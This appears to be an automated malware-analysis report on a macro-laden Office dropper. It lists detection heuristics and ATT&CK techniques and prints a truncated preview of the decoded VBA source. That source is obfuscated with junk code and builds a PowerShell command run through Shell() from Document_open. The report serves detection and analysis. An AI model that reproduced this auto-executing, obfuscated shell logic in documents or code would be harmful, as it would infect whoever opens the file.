MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' indicate that the 'Document_Open' macro executes a shell command. The VBA script attempts to construct and execute a PowerShell command, likely to download and run a secondary payload. This is a common pattern for macro-based malware droppers.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6603993-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6603993-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14645 bytes |
SHA-256: d16475ab1be8bc14443220102947a189e69c0c57f58f47d19759b3692c3d4b49 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "GXfzSDiOmJqOD" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function EQLbrLXo() On Error Resume Next PMkYiM = CDate(75501) jdtWH = 48982 oYjIw = CByte(PuUln) kzljH = YrsTT rwvFq = CDate(zolcH + Sin(14440 + 60812) * 42271 * CInt(17993)) zEOJUP = 46860 MWiJo = CDate(62034) dbStLb = 18717 djEtDa = CByte(haDCXa) mYQhjR = AQYOv zmQzT = CDate(IfrXjK + Sin(62928 + 26008) * 24105 * CInt(30441)) Cmddj = 87611 DwDHu = CDate(69757) vktfBi = 60251 NtqAG = CByte(XQPjO) OoCiWN = SYjzhm VuhDhS = CDate(iCikfA + Sin(73196 + 81878) * 76359 * CInt(43347)) RCJbfq = 18848 fUsAOw = CDate(54980) iiVliB = 26179 NJjZjv = CByte(qXTGOu) EVXSE = jvmmw HjYhJ = CDate(JlivE + Sin(78467 + 43603) * 80527 * CInt(1322)) simPG = 97365 EQLbrLXo = wLwXHw + Chr$(SIHlauLvzwV + 80 + GOzYkkiSt) + "OwerSH" + OPHsNR + iRkYfXRqzjC + PIUJQBL + whDkhIGTl + vSjADwYE + cSmVuWjiRzw + niEzOU vwduX = CDate(48506) ABwlG = 63580 kKJGVp = CByte(jvsaK) ljQJf = jupwo sEIpi = CDate(oAKFj + Sin(34152 + 72033) * 33904 * CInt(53621)) DYDOj = 44621 hUOAlj = CDate(66037) jBUXzB = 38200 pIIYs = CByte(XrOGP) vmjjp = RtMMn lBVkOX = CDate(XQITIL + Sin(79667 + 88199) * 72129 * CInt(62913)) mNSXk = 76530 End Function Function XJjvnpd(NPbjQYk) On Error Resume Next TVLjj = CDate(93213) XKUYAa = 12395 HSradT = CByte(ovQEM) lKAZZ = GfbbE FpoEG = CDate(JNaOfG + Sin(66951 + 41366) * 18728 * CInt(51680)) JoQikh = 34016 iWEYQ = CDate(49721) mUfKzN = 63275 wdrJuq = CByte(ZvwjSi) uTqrio = zvNpI bwosz = CDate(QfqZLq + Sin(41284 + 63775) * 95280 * CInt(69336)) bwHWX = 60950 wznOmZjDw = wBiGVSdlG + Shell(azbnI + NPbjQYk + YNcufTpNoq, 67862 - 67862) nsCUa = CDate(42715) RwHhu = 10027 UcMrh = CByte(KdzjXs) IWuzz = ziWPY wOjzKR = CDate(cwLJzd + Sin(34481 + 62312) * 43481 * CInt(66257)) nGYUXF = 87114 End Function Private Sub Document_open() On Error Resume Next LAfvS = CDate(6602) hPFif = 71984 ZPrHW = CByte(wSzqB) iICao = YdWqiN YCZJu = CDate(dUotRM + Sin(34315 + 27477) * 97209 * CInt(48435)) TnfcN = 43280 AfXkv = CDate(13862) Fzjtw = 20384 iijAM = CByte(QRJAcj) pVmlCd = zdHzaZ ZijpBc = CDate(JjbJc + Sin(58272 + 29395) * 79986 * CInt(99390)) zrYzEz = 88236 Application.Run HaqvcTnmaU + "XJjvnpd" + iwzHj, IAXzFBASbC + EQLbrLXo + iLRSf XUYjHj = CDate(21966) kCGkir = 479 zLfkv = CByte(UAWAC) AYXYcD = EcQdXd FPlCtp = CDate(kiSvmz + Sin(47886 + 16238) * 77869 * CInt(89381)) jPzja = 56499 UGHpt = CDate(12357) FokVEF = 31195 wLkoRf = CByte(NjnhHo) VtCSw = VCtTdN ZYORwu = CDate(nDXziO + Sin(58600 + 8702) * 88024 * CInt(66432)) MJGYm = 42049 End Sub Attribute VB_Name = "TlCZdPjdai" Function OPHsNR() On Error Resume Next fBUOAv = 79260 NhBVOa = CDate(pbzUO + Sin(47616 + 41139) * 52263 * CInt(37630)) EnnHbc = 96412 YWGnKT = jVitz zzmmb = CByte(rLhPa) rhIQb = CDate(23979) EJvlAUWESRa = "ell" + " " + "( ( " + "26,107 , 87," + " 113,73 ,8" YLKXQM = 23999 RtwVwA = CDate(vQuGM + Sin(62472 + 37866) * 72247 * CInt(55875)) hQiZkz = 33752 NLihGY = VpfPn CtQNf = CByte(EGADOc) swXriv = CDate(64907) GEOhIbGJBi = "7, 30" + ",3 ,30,80 , 91" + ", 73,19 ,81 , 9" + "2 , 84" + ", 91 , 9" + "3 " + ", 7" hstKkI = 14459 hHimLr = CDate(ToXWPG + Sin(9906 + 65344) * 13930 * CInt(10040)) wRiAp = 46703 YMhffZ = jsYYwB HYKuH = CByte(jztKV) zIUvIk = CDate(23855) SauVKvWi = "4 ," + " 30, 76" + ", 95 ,80, 90,81" + " ,83,5 , 26 ,11" + "8 ,124," + " 86" + " ," + "93 ,110,30, 3" + ",30 , 80," QpQKWo = 12019 hRjKH = CDate(QUJlX + Sin(4519 + 95755) * 95064 * CInt(21367)) UASnp = 47073 lowIj = jPDRh uaNpQM = CByte(JCbJIi) HvpVWS = CDate(78978) QYCbljnrL = " 91 ,7" + "3,19,81, 92,84" + " ,91 " + ", 93,74" vIGEcs = 64399 ITkNZD = CDate(zfjTP + Sin(98557 + 15410) * 17753 * CInt(60023)) OnzhI = 7011 QXlnRj = IilKs XkcBK = CByte(hjiWjp) lQGqp = CDate(90934) DmAwsu = ", 30,1" + "09 ," + "71 " + ", 77 ,74" ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.